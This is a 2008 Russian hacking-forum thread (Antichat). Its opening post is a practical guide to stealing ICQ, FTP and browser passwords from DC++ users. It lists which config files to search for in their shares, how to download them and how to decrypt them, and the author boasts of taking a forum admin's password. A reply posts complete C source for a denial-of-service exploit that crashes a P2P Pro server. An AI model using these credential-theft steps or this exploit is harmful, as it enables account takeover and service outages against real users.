Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Авторские статьи (https://forum.antichat.xyz/forumdisplay.php?f=31)
-   -   Инструмент: Dc++ (https://forum.antichat.xyz/showthread.php?t=71607)

WeddRRRyss 26.05.2008 19:32

Инструмент: Dc++
 
Мини мануал о том, что можно вытворять на хабе.
Все, ниже изложенное было придумано и написано мной, мб эта тема уже поднималась.
1. Угон icq.
Всем известно, что пассы от кипа содержаться в файле config.ini. Очень много юзверей, расшаривающих свои program files в которых зачастую находится дира qip. Далее все просто, идем поиск, вписываем config.ini, ищем. Перед тем как сливать все найденные конфиги, обязательно смотрите путь до этого файла, дабы не слить шлак. (Примерный путь до конфига: QIP/user/nomerICQ/config.ini)
После того, как мы слили конфиг расшифровываем его прогой МПР . (Жмем «мастер», выбираем нужный модуль, ставим путь до скачанного конфига, смотрим пасс=)
Аналогичным образом можно тырить пассы от R&Q, файл конфига - andrq.ini
В случае с клиентами Mirana, Icq 5, Odigo, Pidgin нужно тянуть всю папку.
2. Угон фтп.
Все аналогично. Клиенты/файлы с конфигами.
BulletProof FTP Client - bpftp.dat
FileZilla - FileZilla.xml
FTP Commander - ftplist.txt
Total Commander - wcx_ftp.ini
Ищем конфиги, сливаем, расшифровываем.
3. Сохраненные в браузерах данные. (Protected Storage).
Opera - wand.dat
Mozilla Firefox - *.s *.txt (лучше тянуть всю папку)
Internet Explorer – неебу (также тянем всю папку)
Далее аналогично, сливаем, расшифровываем той же МПР.
Есть задумка, тырить серты от Вм для входа в кипер лайт.. Но пока я не пробовал реализовать эту идею.
4. Не палим содержимое винта.
Часто бывает так, что для нормальной загрузки файлов с дц++ нужно расшарить нное кол-во гб, режим "за стеклом" лишь запрещает закачку другим юзерам ваших расшаренных файлов, но не просмотр названий и путей содержимого. А нам палить содержимое винта не нужно. Можно открыть любой файл хекс редактором и напихать в ручную в конец всякого говна.. Но 10гб говна это жестоко=) Для этого можно заюзать прогу Rubbish 1.0 , она добавялет указанное количество мусора в конец файла.

Примечание.
Всегда внимательно смотрите ники юзеров у кого сливаете конфиги, ибо нередко слабоумные админы/модеры известных или "нужных" проектов расшаривают свою конфиденциальную инфу. (у меня получалось слить конфиг от оперы одмина нашего локального форума, где у него лежал пасс от админки. Хотя до этого, его форум йа пытался похекать несколько дней)
После прочтения статьи внимательно просмотрите ваши расшаренные файлы).
Удачи всем!
(c) WedRRRySS

Интересное по теме:
Флудер ДЦ++ http://forum.antichat.ru/thread36241.html
Выбивание юзверей из сети http://forum.xakep.ru/m_770333/tm.htm

SMAC 26.05.2008 19:56

Цитата:

Internet Explorer – неебу (также тянем всю папку)
Нах, IE хранит пароли в Protected Storage

А так идея баян и статью эту уже кто-то писал

WeddRRRyss 26.05.2008 20:00

Цитата:

Сообщение от SMAC
Нах, IE хранит пароли в Protected Storage

А так идея баян и статью эту уже кто-то писал

Йа лично дошел до способа сам..

De-visible 26.05.2008 20:03

И это статья???????!!!
М-Да удивил!

k0lbasa 26.05.2008 20:05

в сети народу мало, подскажите какой-нибудь крупный инет хаб

Чиловег Ниоткудо 26.05.2008 20:05

имхо, во многих случаях придется тянуть реестр(!)...xD

SMAC 26.05.2008 20:07

Цитата:

Сообщение от k0lbasa
в сети народу мало, подскажите какой-нибудь крупный инет хаб

->http://dchublist.ru/

-=lebed=- 26.05.2008 20:17

TC, я слыхал есть эксплоиты под Dc++, вот если бы ты сделал их обзор, то у статьи есть шанс выжить...

Solide Snake 26.05.2008 20:24

Exploit EVILGMP, отрубает серв))

PHP код:

/* 
   P2P Pro Command DOS Exploit 
------------------------------------ 
Infam0us Gr0up - Securiti Research 

Info: infamous.2hell.com 
Vendor URL: http://www.digital-revolution.org/P2PPro.html 

*/ 

#include <string.h> 
#include <winsock2.h> 
#include <stdio.h> 

#pragma comment(lib, "ws2_32.lib") 

char doscore[] = 
"\x3f\x3f\xbc\x59\x70 " 
"\x32\x70\x3f\xe1 " 
"\x2b\x5c\x3f\xa6\xeb\xa6" 
"\x50\x46\x2b\x5c\x3f\xa6\xeb\xa6" 
"\x50\x4f\x57\x4e\x45\x44\x2e\x74" 
"\x78\x74\x2b\x5c\x3f\xa6\xeb\xa6" 
"\x50\x31\x32\x33\x32\x34\x32\x2e\x6b\x62"


int main(int argcchar *argv[]) 

WSADATA wsaData
WORD wVersionRequested
struct hostent *pTarget
struct sockaddr_in sock
char *target
int port,bufsize
SOCKET inetdos

if (
argc 2

printf(" P2P Pro Command DOS Exploit \n"argv[0]); 
printf(" --------------------------------------\n"argv[0]); 
printf(" Infam0us Gr0up - Securiti Research\n\n"argv[0]); 
printf("[-]Usage: %s [target] [port]\n"argv[0]); 
printf("[?]Exam: %s localhost 7802\n"argv[0]); 
exit(
1); 


wVersionRequested MAKEWORD(11); 
if (
WSAStartup(wVersionRequested, &wsaData) < 0) return -1

target argv[1]; 
port 7802

if (
argc >= 3port atoi(argv[2]); 
bufsize 1024
if (
argc >= 4bufsize atoi(argv[3]); 

inetdos socket(AF_INETSOCK_STREAM0); 
if(
inetdos==INVALID_SOCKET

printf("Socket ERROR \n"); 
exit(
1); 

printf(" P2P Pro Command DOS Exploit \n"argv[0]); 
printf(" --------------------------------------\r\n\n"argv[0]); 
printf("Resolve host... "); 
if ((
pTarget gethostbyname(target)) == NULL

printf("FAILED \n"argv[0]); 
exit(
1); 

printf("[OK]\n "); 
memcpy(&sock.sin_addr.s_addrpTarget->h_addrpTarget->h_length); 
sock.sin_family AF_INET
sock.sin_port htons((USHORT)port); 

printf("[+] Connecting... "); 
if ( (
connect(inetdos, (struct sockaddr *)&socksizeof (sock) ))) 

printf("FAILED\n"); 
exit(
1); 

printf("[OK]\n"); 
printf("Target listen.. \n"); 
printf("Sending bad procedure... "); 
if (
send(inetdosdoscoresizeof(doscore)-10) == -1

printf("ERROR\n"); 
closesocket(inetdos); 
exit(
1); 

printf("[OK]\n "); 
printf("[+] Server SHUTDOWNED!\n"); 
closesocket(inetdos); 
WSACleanup(); 
return 
0



WeddRRRyss 26.05.2008 20:24

Цитата:

Сообщение от -=lebed=-
TC, я слыхал есть эксплоиты под Dc++, вот если бы ты сделал их обзор, то у статьи есть шанс выжить...

Попробую поискать..


Время: 17:00